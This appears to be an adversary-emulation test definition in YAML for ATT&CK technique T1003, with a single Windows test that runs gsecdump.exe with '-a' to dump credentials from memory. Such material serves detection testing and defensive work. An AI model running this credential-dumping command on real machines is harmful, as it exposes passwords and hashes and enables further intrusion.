attack_technique: T1003
display_name: OS
atomic_tests:
- name: Gsecdump
  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
  description: |
    Dump credentials from memory using Gsecdump.
  supported_platforms:
  - windows
  input_arguments:
    gsecdump_exe:
      description: Path to the Gsecdump executable
      type: path
      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
  executor:
    command: |
      "#{gsecdump_exe}" -a
    name: command_prompt